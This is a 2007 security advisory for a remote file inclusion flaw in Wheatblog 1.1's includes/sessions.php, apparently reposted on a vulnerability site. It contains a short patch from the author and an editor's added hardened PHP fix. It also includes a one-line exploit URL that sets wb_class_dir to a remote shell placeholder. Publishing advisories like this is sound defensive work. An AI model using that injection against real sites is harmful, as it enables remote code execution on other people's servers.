Computer Security
[EN] securityvulns.ru

From: HACKERS PAL <security_(at)_soqor.net>
Date: 22.11.2007
Subject: Wheatblog (wB) Remote File inclusion ..

Hello,

Wheatblog (wB) Remote File inclusion ..

Tested on 1.1; older versions are injectable too.

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

Remote File Inclusion
file : includes/sessions.php

line 2 :
code:-
include_once("$wb_class_dir/classDatabase.php");

The variable wb_class_dir can be controlled and edited so that the file is included from a remote host.

Solution

replace
code :-
include_once("$wb_class_dir/classDatabase.php");

with
code:-
// Protected By : HACKERS PAL
// Security@soqor.net
// Http://WwW.SoQoR.NeT

// check the request, not $_GLOBALS ($_GLOBALS is not a PHP superglobal; it was never set)
if(eregi("sessions.php",$PHP_SELF) || isset($_REQUEST['wb_class_dir']))
{
die("<h1>Forbidden 403<br> Protected By : HACKERS PAL</h1>");
}
include_once("$wb_class_dir/classDatabase.php");


Exploit : -
includes/sessions.php?wb_class_dir=[Ev!1-Sh311]?

#WwW.SoQoR.NeT
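Editor's added example (not Wheatblog's code and not the advisory author's patch): a hardened head for includes/sessions.php that removes the root cause rather than pattern-matching the request. The advisory's check relies on $PHP_SELF, which is itself a register_globals variable, so it can be defeated in the same way; the version below takes the class directory from a constant and verifies it resolves inside the application tree. WB_CLASS_DIR and the ../classes layout are assumptions; the real Wheatblog config key is not stated in the advisory.

```php
<?php
// Hardened replacement for line 2 of includes/sessions.php (added example).
// Vulnerable original:  include_once("$wb_class_dir/classDatabase.php");
// With register_globals on, ?wb_class_dir=http://... populated that variable.

// 1. Refuse direct requests to this include file without trusting
//    $PHP_SELF (a register_globals variable); $_SERVER is server-populated.
if (basename($_SERVER['SCRIPT_FILENAME']) === basename(__FILE__)) {
    header('HTTP/1.1 403 Forbidden');
    exit('Forbidden');
}

// 2. Never let request data reach the include path: take it from a constant
//    defined by the application's own configuration. WB_CLASS_DIR and the
//    fallback path are assumed names for this example.
if (!defined('WB_CLASS_DIR')) {
    define('WB_CLASS_DIR', dirname(__FILE__) . '/../classes');
}
$wb_class_dir = WB_CLASS_DIR;   // overwrites anything register_globals set

// 3. Canonicalise and confirm the directory is inside the application tree.
//    realpath() returns false for http://, ftp://, data: and php:// wrappers,
//    and the prefix check stops ../ escapes and null-byte tricks.
$app_root  = realpath(dirname(__FILE__) . '/..');
$class_dir = realpath($wb_class_dir);
if ($app_root === false || $class_dir === false
    || strpos($class_dir, $app_root . DIRECTORY_SEPARATOR) !== 0) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('Invalid class directory configuration');
}

include_once $class_dir . '/classDatabase.php';
```

Independently of this patch, setting register_globals=Off and allow_url_include=Off in php.ini removes the two conditions the reported exploit depends on.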

© SecurityVulns, 3APA3A, Vladimir Dubrovin